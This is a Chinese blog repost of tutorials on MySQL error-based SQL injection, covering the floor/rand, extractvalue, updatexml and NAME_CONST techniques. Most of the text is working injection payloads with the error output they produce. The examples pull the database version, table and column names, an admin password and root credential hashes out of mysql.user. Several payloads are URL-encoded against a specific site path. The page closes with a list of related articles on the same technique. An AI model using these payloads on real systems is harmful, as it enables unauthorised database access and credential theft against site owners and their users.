mysql 3种报错模式注入

最新推荐文章于 2024-05-24 15:55:04 发布
最新推荐文章于 2024-05-24 15:55:04 发布
阅读量3k 收藏
点赞数
分类专栏: mysql 文章标签: mysql sql security

1、通过floor报错

可以通过如下一些利用代码

and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select  !1)x group by concat((select table_name from information_schema.tables  limit 1),floor(rand(0)*2)));

举例如下:
首先进行正常查询:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

假如id输入存在注入的话,可以通过如下语句进行报错。

mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat(version(),floor(rand(0)*2))x from  information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
例如我们需要查询管理员用户名和密码:

Method1:

mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat((select pass from admin where id  =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method2:

mysql> select * from article where id = 1 and (select count(*)  from (select 1 union select null union select !1)x group by  concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

2、ExtractValue
测试语句如下

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

实际测试过程

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));--
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

3、UpdateXml

测试语句

and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))

实际测试过程

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,(select pass from admin limit 1),0x5e24),1));

ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'

原文链接:http://www.dreaminto.com/2013/0620/753.html


http://xxx.cn/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c) 
 
Error:Duplicate column name ‘5.0.27-community-nt’Error:Duplicate column name ‘5.0.27-community-nt’
 
http://xxx.cn/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)

MYSQL高版本报错注入技巧-利用NAME_CONST注入

It's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it. 


相关信息

NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.

Code:
NAME_CONST(DATA, VALUE)

Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.

SELECT NAME_CONST('TEST', 1)



|---------------|
|     TEST      |
|               |
|---------------|
|       1       |
|               |
|---------------|



http://dev.mysql.com/doc/refman/5.0/en/m...name-const
Intro to MySQL Variables

Once you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.

Code:
http://www.2cto.com /qcwh/content/detail.php?id=330&sid=19&cid=261'
 

 
\

Code:
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--

VAR = Your MySQL variable.

MySQL 5.1.3 Server System Variables

Let's try it out on my site..

Code:
http://www.2cto.com /qcwh/content/detail. php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

Error:Duplicate column name '5.0.27-community-nt'

 
\

Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...

Data Extraction

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--

We should get a duplicate column 1 error...

Code:
http://www.2cto.com /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--

Error:Duplicate column name '1

 
\

Now let's get the tables out this bitch..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Let's see if it works here, if it does, we can go on and finish the job.

Code:
http://www.2cto.com /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--


Error:Duplicate column name 'com_admanage

 
\

Now I'm going to be lazy and use  mysql .user as an example, just for the sake of time.

Let's get the columns out of the user table..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this, and I get the duplicate column name 'Host'.

Code:
http://www.2cto.com /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--

Error:Duplicate column name 'Host'

 
\

Woot, time to finish this bitch off.

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this...

Code:
http://www.2cto.com /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--

Error:Duplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
来源:http://www.dreaminto.com/2013/0620/753.html

你好八月
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
MYSQL注入-显错注入
晨辰.的博客
05-02 1075
MYSQL数据库注入
concat mysql sql注入_sql注入入门 之 mysql 显错注入 [ floor()显错 ]
weixin_32869687的博客
12-29 142
1,实例显错mysql 注入点,如下:1、http://www.vuln.com/profile_view.php?id=13 2,尝试单引号后,目标如期报错,很好,我们要的正是这个报错信息,因为后面的查询全都要靠它,另外,从报错信息来看,我们知道目标是linux的机器,网站的物理路径也顺便送给了我们,如果root的注入点,我们岂不是,嘿嘿……1、http://www.vuln.com/pr...
Mysql注入详细讲解
最新发布
2401_84466359的博客
05-24 961
*原理:**用户向数据库里存入恶意的数据,在数据被插入到数据库之前,肯定会对数据库进行转义处理,但用户输入的数据的内容肯定是一点摸样也不会变的存进数据库里,而一般都默认为数据库里的信息都是安全的,查询的时候不会进行处理,所以当用户的恶意数据被web程序调用的时候就有可能出发SQL注入。GET/POST提交数据时,发现提交的数据被加密了(可能js加密),那么在提交数据前,抓包,解密,将注入语句写好,然后将整个语句进行加密(相同加密算法),再将数据发过去。HTTP 头注入常常发生在程序采集用户信息的模块中。
mysql floor报错注入_mysql报错注入总结
weixin_33134401的博客
01-26 204
最近又深刻的研究了一下mysql报错注入,发现很多值得记录的东西,于是写了这篇博客做一个总结,目的是为了更深刻的理解报错注入报错注入原因及分类既然是研究报错注入,那我们先要弄明白为什么我们的注入语句会导致数据库报错,报错的原因我自己总结了一下,有以下几点重复数据报错,这里的重复主要有两个方面,其中之一是基于主键的唯一性:一个表主键必须是唯一的,如果一个表尝试生成两个相同的主键,就会爆出Dupli...
Mysql显错注入
weixin_59584646的博客
08-07 260
MySQL显错注入
MySQL显错注入
weixin_53863129的博客
09-09 99
显错注入 这里拿MySQL数据库做事例,其他数据库方法类似,函数有差异而已 准备知识: 1、MySQL数据库5.0以上版本有系统自带库(information_schema),其他数据库可采用爆破或猜解来得到 2、 库名:table_schema 表名:table_name 字段名:table_column 核心:显错注入,顾名思义就是利用数据库查询语句,将数据库的内容显示出来,一般在回显页面中,网页源代码可能也存在回显 1、判断是否存在注入 http://192.16
mysql注入报错函数,mysql报错注入
weixin_32175667的博客
03-18 334
1、报错注入攻击payload语法由于后台没有对数据库的报错信息做过滤,会输入到前台显示,那么我们可以利用制造报错函数(常用的几个函数updatexml(),extractvalue(),floor())进行渗透。报错注入流程:1、判断是否存在注入点2、构造错误的语法制造报错3、使用提示报错信息输出内容。updatexml()函数:xml可扩展标记语言,update()更新函数updatexml(...
什么是mysql显错注入_十MYSQL显错注入原理讲解(一)
weixin_42505397的博客
02-05 114
开篇我要说下,在《代码审计:企业级Web代码安全架构》这本书中讲十MYSQL显错注入,讲的很清楚。感兴趣请去读完,若处于某原因没读还想了解,那请继续往下。1、count,rand,floorselect * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from...
mysql显错注入_MySQL注入显错注入
weixin_42548708的博客
02-02 106
Mysql相关知识点:库:就是一堆表组成的数据集合数据库里自带的系统库:information_schemaInformation_schema里columns表里存着所有字段名information_schema里schemata表里存着所有库名information_schema里tables表里存着所有表名常用的sql语句:Select * from :从表里查询所有内容Where :有条件...
SQL注入mysql显错注入
weixin_34060741的博客
11-12 854
在我们实际渗透中,明明发现一个注入点,本以为丢给sqlmap就可以了,结果sqlmap只显示确实是注入点,但是数据库却获取不了,如图1所示,这时我们可以使用手工进行注入,判断出过滤规则以及基本过滤情况,然后再选择对应的sqlmap脚本(如果有的话),本文主要是讲述如何通过mysql函数报错来进行注入,另外如何使用手工进行全程注入的利用过程,如果你...
学习笔记 MSSQL显错手工注入
weixin_34150224的博客
12-13 110
和朋友一起学习,速度就是快。感谢珍惜少年时。 网上很多都在长篇大论MSSQL显错手工注入,其实原理只有一小段。如下: ' and(查询一段内容)=1and'C'='Cnvarchar类型(查询一段内容的返回)会自动转换int类型,肯定会转换失败。然后报错将nvarchar类型(查询一段内容的返回) 的值显示出来。 由这个原理衍生出单字段查询。如下: ' and 0=(SELECT...
MYSQL updatexml()函数报错注入解析
09-09
主要介绍了MYSQL updatexml()函数报错注入解析,并且简单介绍了updatexml函数,具有一定参考价值,需要的朋友可以了解下。
mysql注入报错函数_sql注入 报错注入常用的三函数
weixin_39834788的博客
02-02 1034
1.floor()函数报错原因是报错的原因是因为rand()函数在查询的时候会执行一次,插入的时候还会执行一次.这就是整个语句报错的关键前面说过floor(rand(0)*2) 前六位是0110110group by x先建立一个空表,用于分组.然后进行分组查询,第一次rand()执行,查询的结果是0,因为是空表所以插入这条,而插入的时候rand()又执行了一次,所以表中的结果就是第一次执行完,接...
mysql报错注入_Mysql报错注入之函数分析
weixin_35555531的博客
12-23 109
1.floor函数学习中遇见了 select count() from table group by floor(rand(0)2);这么条语句。秉持着不求甚解的态度,在此做个总结。首先,只要该语句明白了,那么类似select count(),(floor(rand(0)2))x from table group by x;这样的变形语句基本上都可以变通(这里只是起了个别名)。基本的查询 sele...
MySQL 报错注入
Risk2S的小博客
05-20 1383
利用数据库报错来显示数据的注入方式。通常注入sql语句一般是“select * from 表 where 参数=值” ①: floor() 注入语句: id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2)) x from information_schema.table
MySQL报错注入函数汇总
Au
06-12 5136
常用函数 字符串连接函数,将多个字符串连接成一个字符串,当中间字符串有一个为空时,最后结果也为空 concat(str1, str2, str3 ,...) concat_ws('指定分隔符', str1,str2,str3...) 开头指定分隔符,与concat()不同,它会自动忽略中间的空值,只有分隔符为空,整体才返回空 group_concat...
Mysql报错注入之函数分析
Ms08067安全实验室
02-21 756
1.floor函数学习中遇见了 select count() from table group by floor(rand(0)2); 这么条语句。秉持着不求甚解的态度,在此做个总结。首...
Sql注入学习笔记——MySQL显错注入
qq_44720214的博客
07-26 1241
显错注入又叫报错注入,其原理是通过利用数据库的某些机制,人为地制造错误条件使得查询结果能够出现在错误信息中。
MySQL报错注入
yuan_boss的博客
08-23 2176
触发报错的方式有很多,具体细节也不尽相同。注意:通过concat()函数拼接的字符串长度只有31位,所以需要借助substr对结果进行截取,然后通过替换截取的下标来获取所有信息。领取地址:链接:https://pan.baidu.com/s/1OeEMML4GRCsbC4LpQK9KoA?cms靶场中具有sql注入的地址:http://localhost/cms/cms/show.php?​ 在注入点的判断过程中,发现数据库中SQL 语句的报错信息,会显示在页面中,因此可以利用报错信息进行注入
MySQL报错注入技术详解
"本文主要介绍了MySQL的五报错注入技术,这些技术通常用于安全漏洞测试和数据库信息泄露。报错注入是利用应用程序错误处理机制,通过构造特定的SQL查询来获取数据库的相关信息,如数据库版本、用户信息、连接...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值